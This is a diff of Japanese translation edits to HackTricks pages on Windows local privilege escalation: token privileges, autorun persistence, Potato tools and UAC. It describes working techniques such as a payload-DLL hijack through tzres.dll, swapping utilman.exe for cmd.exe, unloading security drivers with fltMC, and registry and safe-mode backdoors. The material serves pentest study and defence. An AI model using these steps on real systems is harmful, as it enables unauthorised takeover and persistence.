+`SeManageVolumePrivilege`は、ユーザーがディスクボリュームを管理することを許可するWindowsのユーザー権限であり、ボリュームの作成や削除を含みます。管理者向けに設計されていますが、非管理者ユーザーに付与されると、特権昇格に悪用される可能性があります。
 
-この特権を利用してボリュームを操作し、完全なボリュームアクセスを得ることが可能です。[SeManageVolumeExploit](https://github.com/CsEnox/SeManageVolumeExploit) を使用すると、C:\ のすべてのユーザーに完全なアクセスを付与できます。
+この特権を利用してボリュームを操作し、完全なボリュームアクセスを得ることが可能です。[SeManageVolumeExploit](https://github.com/CsEnox/SeManageVolumeExploit)を使用すると、C:\のすべてのユーザーに完全なアクセスを付与できます。
 
-さらに、[この Medium 記事](https://medium.com/@raphaeltzy13/exploiting-semanagevolumeprivilege-with-dll-hijacking-windows-privilege-escalation-1a4f28372d37) に記載されているプロセスでは、`SeManageVolumePrivilege` と DLL ハイジャックを組み合わせて特権を昇格させる方法が説明されています。ペイロード DLL `C:\Windows\System32\wbem\tzres.dll` を配置し、`systeminfo` を呼び出すことで DLL が実行されます。
+さらに、[このMediumの記事](https://medium.com/@raphaeltzy13/exploiting-semanagevolumeprivilege-with-dll-hijacking-windows-privilege-escalation-1a4f28372d37)で説明されているプロセスでは、`SeManageVolumePrivilege`とDLLハイジャックを組み合わせて特権を昇格させる方法が述べられています。ペイロードDLL `C:\Windows\System32\wbem\tzres.dll`を配置し、`systeminfo`を呼び出すことでDLLが実行されます。
 
 ## Check privileges
 ```
@@ -159,22 +159,22 @@ Or the **script** embed in this [**post**](https://www.leeholmes.com/adjusting-t
 
 ## Table
 
-フルトークン権限チートシートは [https://github.com/gtworek/Priv2Admin](https://github.com/gtworek/Priv2Admin) にあります。以下の要約は、管理者セッションを取得したり、機密ファイルを読み取るための特権を悪用する直接的な方法のみをリストします。
+フルトークン権限のチートシートは [https://github.com/gtworek/Priv2Admin](https://github.com/gtworek/Priv2Admin) にあります。以下の要約は、特権を悪用して管理者セッションを取得したり、機密ファイルを読み取る直接的な方法のみをリストします。
 
 | Privilege                  | Impact      | Tool                    | Execution path                                                                                                                                                                                                                                                                                                                                     | Remarks                                                                                                                                                                                                                                                                                                                        |
 | -------------------------- | ----------- | ----------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
-| **`SeAssignPrimaryToken`** | _**Admin**_ | 3rd party tool          | _"ユーザーがトークンを偽装し、potato.exe、rottenpotato.exe、juicypotato.exeなどのツールを使用してntシステムに特権昇格することを可能にします"_                                                                                                                                                                                                      | Thank you [Aurélien Chalot](https://twitter.com/Defte_) for the update. I will try to re-phrase it to something more recipe-like soon.                                                                                                                                                                                         |
+| **`SeAssignPrimaryToken`** | _**Admin**_ | 3rd party tool          | _"ユーザーがトークンを偽装し、potato.exe、rottenpotato.exe、juicypotato.exeなどのツールを使用してntシステムに昇格することを可能にします"_                                                                                                                                                                                                      | Thank you [Aurélien Chalot](https://twitter.com/Defte_) for the update. I will try to re-phrase it to something more recipe-like soon.                                                                                                                                                                                         |
 | **`SeBackup`**             | **Threat**  | _**Built-in commands**_ | `robocopy /b`を使用して機密ファイルを読み取る                                                                                                                                                                                                                                                                                                             | <p>- %WINDIR%\MEMORY.DMPを読み取ることができる場合、より興味深いかもしれません。<br><br>- <code>SeBackupPrivilege</code>（およびrobocopy）は、オープンファイルに関しては役に立ちません。<br><br>- Robocopyは、/bパラメータで動作するためにSeBackupとSeRestoreの両方を必要とします。</p>                                                                      |
 | **`SeCreateToken`**        | _**Admin**_ | 3rd party tool          | `NtCreateToken`を使用してローカル管理者権限を含む任意のトークンを作成します。                                                                                                                                                                                                                                                                          |                                                                                                                                                                                                                                                                                                                                |
 | **`SeDebug`**              | _**Admin**_ | **PowerShell**          | `lsass.exe`トークンを複製します。                                                                                                                                                                                                                                                                                                                   | Script to be found at [FuzzySecurity](https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Conjure-LSASS.ps1)                                                                                                                                                                                                         |
-| **`SeLoadDriver`**         | _**Admin**_ | 3rd party tool          | <p>1. <code>szkg64.sys</code>のようなバグのあるカーネルドライバをロードします。<br>2. ドライバの脆弱性を悪用します。<br><br>または、この特権を使用して、<code>ftlMC</code>ビルトインコマンドでセキュリティ関連のドライバをアンロードすることができます。すなわち：<code>fltMC sysmondrv</code></p>                                                                           | <p>1. <code>szkg64</code>の脆弱性は<a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15732">CVE-2018-15732</a>としてリストされています。<br>2. <code>szkg64</code>の<a href="https://www.greyhathacker.net/?p=1025">エクスプロイトコード</a>は<a href="https://twitter.com/parvezghh">Parvez Anwar</a>によって作成されました。</p> |
-| **`SeRestore`**            | _**Admin**_ | **PowerShell**          | <p>1. SeRestore特権を持つ状態でPowerShell/ISEを起動します。<br>2. <a href="https://github.com/gtworek/PSBits/blob/master/Misc/EnableSeRestorePrivilege.ps1">Enable-SeRestorePrivilege</a>で特権を有効にします。<br>3. utilman.exeをutilman.oldに名前変更します。<br>4. cmd.exeをutilman.exeに名前変更します。<br>5. コンソールをロックし、Win+Uを押します。</p> | <p>攻撃は一部のAVソフトウェアによって検出される可能性があります。</p><p>代替方法は、同じ特権を使用して「Program Files」に保存されたサービスバイナリを置き換えることに依存します。</p>                                                                                                                                                            |
+| **`SeLoadDriver`**         | _**Admin**_ | 3rd party tool          | <p>1. <code>szkg64.sys</code>のようなバグのあるカーネルドライバをロードします。<br>2. ドライバの脆弱性を悪用します。<br><br>または、この特権を使用して、<code>ftlMC</code>ビルトインコマンドでセキュリティ関連のドライバをアンロードすることができます。例：<code>fltMC sysmondrv</code></p>                                                                           | <p>1. <code>szkg64</code>の脆弱性は<a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15732">CVE-2018-15732</a>としてリストされています。<br>2. <code>szkg64</code>の<a href="https://www.greyhathacker.net/?p=1025">エクスプロイトコード</a>は<a href="https://twitter.com/parvezghh">Parvez Anwar</a>によって作成されました。</p> |
+| **`SeRestore`**            | _**Admin**_ | **PowerShell**          | <p>1. SeRestore特権を持ってPowerShell/ISEを起動します。<br>2. <a href="https://github.com/gtworek/PSBits/blob/master/Misc/EnableSeRestorePrivilege.ps1">Enable-SeRestorePrivilege</a>で特権を有効にします。<br>3. utilman.exeをutilman.oldに名前変更します。<br>4. cmd.exeをutilman.exeに名前変更します。<br>5. コンソールをロックし、Win+Uを押します。</p> | <p>攻撃は一部のAVソフトウェアによって検出される可能性があります。</p><p>代替方法は、同じ特権を使用して「Program Files」に保存されたサービスバイナリを置き換えることに依存します。</p>                                                                                                                                                            |
 | **`SeTakeOwnership`**      | _**Admin**_ | _**Built-in commands**_ | <p>1. <code>takeown.exe /f "%windir%\system32"</code><br>2. <code>icalcs.exe "%windir%\system32" /grant "%username%":F</code><br>3. cmd.exeをutilman.exeに名前変更します。<br>4. コンソールをロックし、Win+Uを押します。</p>                                                                                                                                       | <p>攻撃は一部のAVソフトウェアによって検出される可能性があります。</p><p>代替方法は、同じ特権を使用して「Program Files」に保存されたサービスバイナリを置き換えることに依存します。</p>                                                                                                                                                           |
 | **`SeTcb`**                | _**Admin**_ | 3rd party tool          | <p>トークンを操作してローカル管理者権限を含めることができます。SeImpersonateが必要な場合があります。</p><p>確認が必要です。</p>                                                                                                                                                                                                                                     |                                                                                                                                                                                                                                                                                                                                |
 
 ## Reference
 
-- Windowsトークンを定義するこの表を見てください：[https://github.com/gtworek/Priv2Admin](https://github.com/gtworek/Priv2Admin)
-- トークンを使用した特権昇格に関する[**この論文**](https://github.com/hatRiot/token-priv/blob/master/abusing_token_eop_1.0.txt)を見てください。
+- Windowsトークンを定義するこの表を見てください: [https://github.com/gtworek/Priv2Admin](https://github.com/gtworek/Priv2Admin)
+- トークンを使用したprivescに関する[**この論文**](https://github.com/hatRiot/token-priv/blob/master/abusing_token_eop_1.0.txt)を見てください。
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
index dbfb14afc..4033bb295 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
@@ -6,14 +6,14 @@
 
 ## WMIC
 
-**Wmic**は**スタートアップ**でプログラムを実行するために使用できます。スタートアップで実行されるようにプログラムされているバイナリを確認するには、次のコマンドを使用します:
+**Wmic**は**スタートアップ**でプログラムを実行するために使用できます。スタートアップで実行されるようにプログラムされたバイナリを確認するには、次のコマンドを使用します:
 ```bash
 wmic startup get caption,command 2>nul & ^
 Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
 ```
 ## スケジュールされたタスク
 
-**タスク**は**特定の頻度**で実行されるようにスケジュールできます。実行されるようにスケジュールされたバイナリを確認するには:
+**タスク**は**特定の頻度**で実行されるようにスケジュールできます。実行されるようにスケジュールされているバイナリを確認するには:
 ```bash
 schtasks /query /fo TABLE /nh | findstr /v /i "disable deshab"
 schtasks /query /fo LIST 2>nul | findstr TaskName
@@ -38,7 +38,7 @@ Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
 ## レジストリ
 
 > [!NOTE]
-> [Note from here](https://answers.microsoft.com/en-us/windows/forum/all/delete-registry-key/d425ae37-9dcc-4867-b49c-723dcd15147f): **Wow6432Node** レジストリエントリは、64ビットのWindowsバージョンを実行していることを示します。オペレーティングシステムは、このキーを使用して、64ビットWindowsバージョンで実行される32ビットアプリケーションのためにHKEY_LOCAL_MACHINE\SOFTWAREの別のビューを表示します。
+> [ここからの注意](https://answers.microsoft.com/en-us/windows/forum/all/delete-registry-key/d425ae37-9dcc-4867-b49c-723dcd15147f): **Wow6432Node** レジストリエントリは、64ビットのWindowsバージョンを実行していることを示します。オペレーティングシステムは、このキーを使用して、64ビットのWindowsバージョンで実行される32ビットアプリケーションのために、HKEY_LOCAL_MACHINE\SOFTWAREの別のビューを表示します。
 
 ### 実行
 
@@ -145,7 +145,7 @@ Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\Ru
 - `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders`
 - `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders`
 
-**スタートアップ**フォルダーに配置されたショートカットは、ユーザーのログオンまたはシステムの再起動時にサービスやアプリケーションを自動的に起動します。**スタートアップ**フォルダーの場所は、**ローカルマシン**と**現在のユーザー**のスコープの両方でレジストリに定義されています。これは、これらの指定された**スタートアップ**の場所に追加されたショートカットが、ログオンまたは再起動プロセスに続いてリンクされたサービスやプログラムが起動することを保証することを意味し、プログラムを自動的に実行するための簡単な方法となります。
+**スタートアップ**フォルダーに配置されたショートカットは、ユーザーのログオンまたはシステムの再起動時にサービスやアプリケーションを自動的に起動します。**スタートアップ**フォルダーの場所は、**ローカルマシン**と**現在のユーザー**のスコープの両方でレジストリに定義されています。これは、これらの指定された**スタートアップ**場所に追加されたショートカットが、ログオンまたは再起動プロセスに続いてリンクされたサービスやプログラムが起動することを保証することを意味し、プログラムを自動的に実行するための簡単な方法となります。
 
 > [!NOTE]
 > **HKLM**の下の任意の\[User] Shell Folderを上書きできる場合、あなたが制御するフォルダーを指すように設定でき、ユーザーがシステムにログインするたびに実行されるバックドアを配置することができます。
@@ -194,17 +194,17 @@ Windowsレジストリの`HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot`には
 
 「コマンドプロンプト付きセーフモード」で自動的に起動するためのブートオプションを作成する手順：
 
-1. `boot.ini`ファイルの属性を変更して、読み取り専用、システム、隠しフラグを削除します：`attrib c:\boot.ini -r -s -h`
+1. `boot.ini`ファイルの属性を変更して、読み取り専用、システム、隠しフラグを削除します: `attrib c:\boot.ini -r -s -h`
 2. `boot.ini`を編集のために開きます。
-3. 次のような行を挿入します：`multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /SAFEBOOT:MINIMAL(ALTERNATESHELL)`
+3. 次のような行を挿入します: `multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /SAFEBOOT:MINIMAL(ALTERNATESHELL)`
 4. `boot.ini`への変更を保存します。
-5. 元のファイル属性を再適用します：`attrib c:\boot.ini +r +s +h`
+5. 元のファイル属性を再適用します: `attrib c:\boot.ini +r +s +h`
 
 - **Exploit 1:** **AlternateShell**レジストリキーを変更することで、カスタムコマンドシェルの設定が可能になり、不正アクセスの可能性があります。
 - **Exploit 2 (PATH書き込み権限):** システムの**PATH**変数の任意の部分に書き込み権限があると、特に`C:\Windows\system32`の前にある場合、カスタム`cmd.exe`を実行でき、セーフモードでシステムが起動した場合はバックドアになる可能性があります。
 - **Exploit 3 (PATHとboot.ini書き込み権限):** `boot.ini`への書き込みアクセスにより、自動的なセーフモード起動が可能になり、次回の再起動時に不正アクセスを容易にします。
 
-現在の**AlternateShell**設定を確認するには、これらのコマンドを使用します：
+現在の**AlternateShell**設定を確認するには、これらのコマンドを使用します:
 ```bash
 reg query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot /v AlternateShell
 Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot' -Name 'AlternateShell'
@@ -293,7 +293,7 @@ HKLM\Software\Microsoft\Wow6432Node\Windows NT\CurrentVersion\Image File Executi
 ```
 ## SysInternals
 
-autorunsを見つけることができるすべてのサイトは、**すでに**[**winpeas.exe**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe)によって検索されています。しかし、**自動実行される**ファイルの**より包括的なリスト**を得るには、Sysinternalsの[autoruns](https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns)を使用することができます:
+autorunsを見つけることができるすべてのサイトは、**すでに**[**winpeas.exe**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe)によって検索されています。しかし、**自動実行される**ファイルの**より包括的なリスト**については、Sysinternalsの[autoruns](https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns)を使用することができます:
 ```
 autorunsc.exe -m -nobanner -a * -ct /accepteula
 ```
diff --git a/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md b/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
index 65de41cb2..a6b6fb0de 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
@@ -2,7 +2,7 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-> [!WARNING] > **JuicyPotatoは** Windows Server 2019 および Windows 10 ビルド 1809 以降では動作しません。しかし、 [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,** [**EfsPotato**](https://github.com/zcgonvh/EfsPotato)**,** [**DCOMPotato**](https://github.com/zcgonvh/DCOMPotato)**は、**同じ特権を利用して `NT AUTHORITY\SYSTEM`\*\* レベルのアクセスを取得するために使用できます。この [ブログ投稿](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) は、JuicyPotato がもはや機能しない Windows 10 および Server 2019 ホストでの偽装特権を悪用するために使用できる `PrintSpoofer` ツールについて詳しく説明しています。
+> [!WARNING] > **JuicyPotatoは** Windows Server 2019 および Windows 10 build 1809 以降では動作しません。しかし、[**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**、** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**、** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**、** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**、** [**EfsPotato**](https://github.com/zcgonvh/EfsPotato)**、** [**DCOMPotato**](https://github.com/zcgonvh/DCOMPotato)** は、**NT AUTHORITY\SYSTEM**\*\* レベルのアクセスを取得するために同じ特権を利用することができます。この [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) は、JuicyPotato がもはや動作しない Windows 10 および Server 2019 ホストでの偽装特権を悪用するために使用できる `PrintSpoofer` ツールについて詳しく説明しています。
 
 ## Quick Demo
 
diff --git a/src/windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md b/src/windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md
index 21e20fb95..02a49fb1d 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md
@@ -3,7 +3,7 @@
 次のコードは**SeDebugおよびSeImpersonateの特権を悪用して**、**SYSTEMとして実行されているプロセス**からトークンをコピーします。\
 この場合、このコードは**Windowsサービスバイナリ**としてコンパイルされ、動作を確認するために使用できます。\
 ただし、**特権昇格が発生するコードの主な部分**は**`Exploit`** **関数**の中にあります。\
-その関数の中では、**プロセス**_**lsass.exe**_**が検索され、次にその**トークンがコピーされ**、最後にそのトークンが使用されて新しい_**cmd.exe**_がコピーされたトークンのすべての特権で生成されます。
+その関数の中では、**プロセス**_**lsass.exe**_**が検索され**、その後**トークンがコピーされ**、最後にそのトークンが使用されて新しい_**cmd.exe**_がコピーされたトークンのすべての特権で生成されます。
 
 **SYSTEMとして実行されている他のプロセス**で、すべてまたはほとんどのトークン特権を持つものには、**services.exe**、**svhost.exe**（最初のものの1つ）、**wininit.exe**、**csrss.exe**...（_保護されたプロセスからトークンをコピーすることはできないことを忘れないでください_）。さらに、管理者として実行されているツール[Process Hacker](https://processhacker.sourceforge.io/downloads.php)を使用して、プロセスのトークンを確認できます。
 ```c
diff --git a/src/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md b/src/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md
index 6d42ead94..bff553cc6 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md
@@ -4,8 +4,8 @@
 
 ### コード
 
-以下のコードは[こちら](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)からです。**プロセスIDを引数として指定**し、指定されたプロセスの**ユーザーとして実行されるCMD**が実行されます。\
-High Integrityプロセスで実行することで、**Systemとして実行されているプロセスのPIDを指定**し、cmd.exeをSystemとして実行できます。
+以下のコードは [here](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962) からのものです。**引数としてプロセスIDを指定する**ことができ、指定されたプロセスの**ユーザーとして実行されるCMD**が実行されます。\
+High Integrityプロセスで実行している場合、**Systemとして実行されているプロセスのPIDを指定する**ことができ（winlogonやwininitのように）、cmd.exeをSystemとして実行できます。
 ```cpp
 impersonateuser.exe 1234
 ```
@@ -154,14 +154,14 @@ return 0;
 [-] CreateProcessWithTokenW Error: 1326
 ```
 これは、High Integrityレベルで実行していても、**十分な権限がない**ことを意味します。\
-現在のAdministrator権限を`svchost.exe`プロセスに対して**processes explorer**（またはprocess hackerを使用することもできます）で確認しましょう：
+現在の`svchost.exe`プロセスに対するAdministrator権限を**processes explorer**（またはprocess hackerを使用することもできます）で確認しましょう：
 
 1. `svchost.exe`のプロセスを選択します
 2. 右クリック --> プロパティ
-3. "セキュリティ"タブの右下にある"権限"ボタンをクリックします
-4. "詳細"をクリックします
-5. "Administrators"を選択し、"編集"をクリックします
-6. "詳細な権限を表示"をクリックします
+3. "セキュリティ"タブの右下にある"権限"ボタンをクリック
+4. "詳細"をクリック
+5. "Administrators"を選択し、"編集"をクリック
+6. "詳細な権限を表示"をクリック
 
 ![](<../../images/image (437).png>)
 
diff --git a/src/windows-hardening/windows-security-controls/uac-user-account-control.md b/src/windows-hardening/windows-security-controls/uac-user-account-control.md
index 712b7fb67..452c8a307 100644
--- a/src/windows-hardening/windows-security-controls/uac-user-account-control.md
+++ b/src/windows-hardening/windows-security-controls/uac-user-account-control.md
@@ -4,9 +4,9 @@
 
 ## UAC
 
-[ユーザーアカウント制御 (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) は、**昇格された活動のための同意プロンプト**を有効にする機能です。アプリケーションには異なる `integrity` レベルがあり、**高いレベル**のプログラムは、**システムを危険にさらす可能性のあるタスク**を実行できます。UACが有効になっている場合、アプリケーションやタスクは常に**非管理者アカウントのセキュリティコンテキストの下で実行**され、管理者が明示的にこれらのアプリケーション/タスクに管理者レベルのアクセスを許可しない限り、システムを実行することはできません。これは、管理者が意図しない変更から保護される便利な機能ですが、セキュリティ境界とは見なされません。
+[ユーザーアカウント制御 (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) は、**昇格された活動のための同意プロンプト**を有効にする機能です。アプリケーションには異なる `integrity` レベルがあり、**高いレベル**のプログラムは、**システムを危険にさらす可能性のあるタスク**を実行できます。UACが有効になっている場合、アプリケーションやタスクは常に**非管理者アカウントのセキュリティコンテキストの下で実行され**、管理者が明示的にこれらのアプリケーション/タスクに管理者レベルのアクセスを許可しない限り、システムを実行することはできません。これは、管理者が意図しない変更から保護される便利な機能ですが、セキュリティ境界とは見なされません。
 
-インテグリティレベルに関する詳細情報:
+インテグリティレベルに関する詳細情報は次のとおりです：
 
 {{#ref}}
 ../windows-local-privilege-escalation/integrity-levels.md
@@ -18,24 +18,24 @@ UACが有効な場合、管理者ユーザーには2つのトークンが与え
 
 | グループポリシー設定                                                                                                                                                                                                                                                                                                                                                           | レジストリキー                | デフォルト設定                                              |
 | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | --------------------------- | ------------------------------------------------------------ |
-| [ユーザーアカウント制御: 組み込みの管理者アカウントの管理者承認モード](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-admin-approval-mode-for-the-built-in-administrator-account)                                                     | FilterAdministratorToken    | 無効                                                       |
-| [ユーザーアカウント制御: UIAccessアプリケーションがセキュアデスクトップを使用せずに昇格を要求できるようにする](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-allow-uiaccess-applications-to-prompt-for-elevation-without-using-the-secure-desktop) | EnableUIADesktopToggle      | 無効                                                       |
-| [ユーザーアカウント制御: 管理者の昇格プロンプトの動作（管理者承認モード）](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-administrators-in-admin-approval-mode)                     | ConsentPromptBehaviorAdmin  | 非Windowsバイナリに対して同意を求めるプロンプト            |
-| [ユーザーアカウント制御: 標準ユーザーの昇格プロンプトの動作](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-standard-users)                                                                   | ConsentPromptBehaviorUser   | セキュアデスクトップでの資格情報を求めるプロンプト        |
-| [ユーザーアカウント制御: アプリケーションのインストールを検出し、昇格を要求する](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-detect-application-installations-and-prompt-for-elevation)                                                       | EnableInstallerDetection    | 有効（ホームのデフォルト）無効（エンタープライズのデフォルト） |
-| [ユーザーアカウント制御: 署名され、検証された実行可能ファイルのみを昇格させる](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-executables-that-are-signed-and-validated)                                                             | ValidateAdminCodeSignatures | 無効                                                       |
-| [ユーザーアカウント制御: セキュアな場所にインストールされたUIAccessアプリケーションのみを昇格させる](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-uiaccess-applications-that-are-installed-in-secure-locations)                       | EnableSecureUIAPaths        | 有効                                                       |
-| [ユーザーアカウント制御: すべての管理者を管理者承認モードで実行する](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-run-all-administrators-in-admin-approval-mode)                                                                               | EnableLUA                   | 有効                                                       |
-| [ユーザーアカウント制御: 昇格を要求する際にセキュアデスクトップに切り替える](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-switch-to-the-secure-desktop-when-prompting-for-elevation)                                                       | PromptOnSecureDesktop       | 有効                                                       |
-| [ユーザーアカウント制御: ファイルおよびレジストリの書き込み失敗をユーザーごとの場所に仮想化する](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-virtualize-file-and-registry-write-failures-to-per-user-locations)                                       | EnableVirtualization        | 有効                                                       |
+| [ユーザーアカウント制御：組み込みの管理者アカウントの管理者承認モード](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-admin-approval-mode-for-the-built-in-administrator-account)                                                     | FilterAdministratorToken    | 無効                                                       |
+| [ユーザーアカウント制御：UIAccessアプリケーションがセキュアデスクトップを使用せずに昇格を要求できるようにする](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-allow-uiaccess-applications-to-prompt-for-elevation-without-using-the-secure-desktop) | EnableUIADesktopToggle      | 無効                                                       |
+| [ユーザーアカウント制御：管理者の管理者承認モードにおける昇格プロンプトの動作](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-administrators-in-admin-approval-mode)                     | ConsentPromptBehaviorAdmin  | 非Windowsバイナリに対して同意を求めるプロンプト            |
+| [ユーザーアカウント制御：標準ユーザーの昇格プロンプトの動作](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-standard-users)                                                                   | ConsentPromptBehaviorUser   | セキュアデスクトップでの資格情報を求めるプロンプト        |
+| [ユーザーアカウント制御：アプリケーションのインストールを検出し、昇格を要求する](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-detect-application-installations-and-prompt-for-elevation)                                                       | EnableInstallerDetection    | 有効（ホームのデフォルト）無効（エンタープライズのデフォルト） |
+| [ユーザーアカウント制御：署名され、検証された実行可能ファイルのみを昇格させる](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-executables-that-are-signed-and-validated)                                                             | ValidateAdminCodeSignatures | 無効                                                       |
+| [ユーザーアカウント制御：セキュアな場所にインストールされたUIAccessアプリケーションのみを昇格させる](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-uiaccess-applications-that-are-installed-in-secure-locations)                       | EnableSecureUIAPaths        | 有効                                                       |
+| [ユーザーアカウント制御：すべての管理者を管理者承認モードで実行する](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-run-all-administrators-in-admin-approval-mode)                                                                               | EnableLUA                   | 有効                                                       |
+| [ユーザーアカウント制御：昇格を要求する際にセキュアデスクトップに切り替える](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-switch-to-the-secure-desktop-when-prompting-for-elevation)                                                       | PromptOnSecureDesktop       | 有効                                                       |
+| [ユーザーアカウント制御：ファイルおよびレジストリの書き込み失敗をユーザーごとの場所に仮想化する](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-virtualize-file-and-registry-write-failures-to-per-user-locations)                                       | EnableVirtualization        | 有効                                                       |
 
 ### UACバイパス理論
 
 一部のプログラムは、**ユーザーが** **管理者グループに属している場合**に**自動的に昇格**されます。これらのバイナリには、_**Manifests**_ 内に _**autoElevate**_ オプションが _**True**_ の値で含まれています。バイナリは、**Microsoftによって署名されている必要があります**。
 
-次に、**UACをバイパス**（**中程度**のインテグリティレベルから**高い**に昇格）するために、一部の攻撃者はこの種のバイナリを使用して**任意のコードを実行**します。なぜなら、それは**高いレベルのインテグリティプロセス**から実行されるからです。
+次に、**UAC**を**バイパス**するために（**中**のインテグリティレベルから**高**に昇格する）、一部の攻撃者はこの種のバイナリを使用して**任意のコードを実行**します。なぜなら、それは**高いインテグリティプロセス**から実行されるからです。
 
-バイナリの_**Manifest**_を確認するには、Sysinternalsのツール_**sigcheck.exe**_を使用できます。また、_Process Explorer_や_Sysinternals_の_Process Monitor_を使用してプロセスの**インテグリティレベル**を確認できます。
